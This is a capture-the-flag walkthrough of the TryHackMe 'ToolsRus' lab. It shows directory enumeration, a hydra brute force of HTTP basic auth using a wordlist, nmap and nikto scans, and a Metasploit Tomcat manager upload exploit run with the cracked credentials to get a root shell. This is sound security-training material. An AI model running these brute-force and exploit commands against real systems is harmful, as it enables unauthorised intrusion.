The Dutch Hacker
ToolsRus Tryhackme

ToolsRus on Tryhackme

This is the write up for the room ToolsRus on Tryhackme and it is part of the Web Fundamentals Path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment

TASKS ToolsRus

Task 1

Start up the machine attached to this room.

1.1 What directory can you find, that begins with a “g”?

We can use dirbuster to enumerate . Open up a terminal and type in the following command dirbuster$

Fill the information as seen in the below screenshot. But do change the IP of the target.

ToolsRus tryhackme

Press start

I always like to see the tree view. The scan is still running but we can see the answer of this question

ToolsRus tryhackme
Answer: guidelines

1.2 Whose name can you find from this directory?

Navigate to this directory with firfox gives us the name

ToolsRus tryhackme

1.3 What directory has basic authentication?

Scan is still running but we can see an other directory called protected

ToolsRus tryhackme
Answer: protected

1.4 What is bob’s password to the protected part of the website?

We know the username is bob but we do now know his password.

First we do an intercept with burp. we use username bob and password password1234

We see the authentication is base 64

options for hydra:

hydra password

Type in the command

hydra -l bob -P /usr/share/wordlists/rockyou.txt -f http-get /protected

-f is to stop when password is found. It is basic authentication with http-get for the directory protected

Here is a nice guide to help you further with hydra and basic authentication

Defeating HTTP Basic Auth with Hydra – Code Zen (

hydra scan

1.5 What other port that serves a webs service is open on the machine?

Type in the following command to find all open ports with services

nmap -sC -sV -T4 <MACHINE_IP>
nmap scan the right way
Answer: 1234

1.6 Going to the service running on that port, what is the name and version of the software? Answer format: Full_name_of_service/Version

We do not need to surf to the site. It is in our nmap scan

Answer: Apache Tomcat/7.0.88

1.7 Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many documentation files did Nikto identify?

Options for Nikto

nikto scan

Use the following command with nikto. ( do change the password )

nikto -host -root /manager/html -port 1234 -id bob:PASSWORDYOUHAVEFOUND
Answer: 5

1.8 What is the server version (run the scan against port 80)?

This is also in the nmap scan we did in 1,4

Answer: apache/2.4.18

1.9 What version of Apache-Coyote is this service using?

This is also in the nmap scan we did in 1,4

Answer: 1.1

1.10 Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?

We know it is apache-coyote 1,1 if we do a bit of research on google we come across this one

Apache Tomcat Manager Authenticated Upload Code Execution (

Open the msfconsole in a terminal

Now we can get and confige the exploit in metasploit by typing in the following

use exploit/multi/http/tomcat_mgr_upload
set target 0
set httppassword bubbles
set httpusername bob
set rhost
set rport 1234
set lhost tun0
ToolsRus tryhackme

Type in shell to get the shell and then type in whoami

Answer: root

1.11 What text is in the file /root/flag.txt

Type in cat /root/flag.txt

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us